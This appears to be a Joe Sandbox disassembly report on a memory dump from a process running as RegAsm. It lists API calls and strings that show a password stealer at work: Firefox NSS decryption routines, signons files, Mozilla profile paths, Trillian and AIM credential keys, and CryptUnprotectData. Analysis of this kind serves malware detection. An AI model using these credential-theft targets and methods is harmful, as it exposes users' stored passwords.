                                                                                                                                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                      • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                                                      • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 107 410c4c-410c87 memset call 405ec5 110 410d64-410d6e 107->110 111 410c8d-410cda GetCurrentDirectoryA SetCurrentDirectoryA memset strlen * 2 107->111 112 410cf9-410cfb 111->112 113 410cdc-410cf7 call 406b4b 111->113 115 410d01-410d15 LoadLibraryExA 112->115 113->115 115->110 117 410d17-410d61 115->117 117->110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                                                        • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                                                        • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                                                                                                      • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 124 4064fb-40651b call 410c4c 127 406521-406555 memset call 406958 124->127 128 4066d9-4066e0 124->128 131 406563 127->131 132 406557-406561 127->132 133 406566-406568 131->133 132->133 135 4066d4 call 410d6f 133->135 136 40656e-4065d3 memset * 3 strlen * 2 133->136 135->128 137 4065d5-4065e6 call 406b4b 136->137 138 4065e8 136->138 141 4065ef-40660c strlen * 2 137->141 138->141 143 406621 141->143 144 40660e-40661f call 406b4b 141->144 146 406628-406645 strlen * 2 143->146 144->146 148 406647-406658 call 406b4b 146->148 149 40665a 146->149 151 406661-406670 call 4069d3 148->151 149->151 155 406681-406690 call 4069d3 151->155 156 406672-40667c call 4062db 151->156 160 4066a1-4066b0 call 4069d3 155->160 161 406692-40669c call 4062db 155->161 156->155 165 4066c1-4066d0 160->165 166 4066b2-4066bc call 4062db 160->166 161->160 165->135 168 4066d2 165->168 166->165 168->135
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406537
                                                                                                                                                                                                                        • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                                                        • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040657E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406596
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004065AE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004065B9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004065C7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004065F2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406600
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040662B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406639
                                                                                                                                                                                                                        • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                                                        • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                                                                                        • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                                                                                        • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                                                                                        • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                                                                                        • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                                                                                        • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                                                                                        • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                                                                                        • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetstrlen$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                                                                                                      • String ID: signons.txt$signons2.txt$signons3.txt

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 394 404d7a-404da3 LoadLibraryA 395 404da5-404db3 394->395 396 404dcd-404dd5 394->396 400 404db5-404db9 395->400 401 404dbe-404dc7 FreeLibrary 395->401 399 404dd6-404ddb 396->399 403 404df4-404df8 399->403 404 404ddd-404df3 MessageBoxA 399->404 405 404dbc 400->405 401->396 402 404dc9-404dcb 401->402 402->399 405->401
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                                                                                                                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FC6B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FC82
                                                                                                                                                                                                                        • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                                                        • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                                                        • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                                                                                        • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                                                                                                                                        • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                                                        • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00412188
                                                                                                                                                                                                                        • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                                                                                                                                                                                                      • :\Program Files, xrefs: 0041217E
                                                                                                                                                                                                                      • ProgramFilesDir, xrefs: 00412150
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                                                                                                                                                                                                      • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                                      • API String ID: 3464146404-1099425022
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411CB8
                                                                                                                                                                                                                        • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                                                                                        • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411CF4
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                                                      • API String ID: 534179979-1827663648
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D959
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                                                                                                                                                                                                        • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                        • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                                                                                                                                        • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                                                                                                                                        • Part of subcall function 0040D794: atoi.MSVCRT(?), ref: 0040D840
                                                                                                                                                                                                                        • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                                                                                                                                                                                                        • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?), ref: 0040D8B3
                                                                                                                                                                                                                        • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?,?,?), ref: 0040D8C6
                                                                                                                                                                                                                        • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2578913611-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2760881011-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0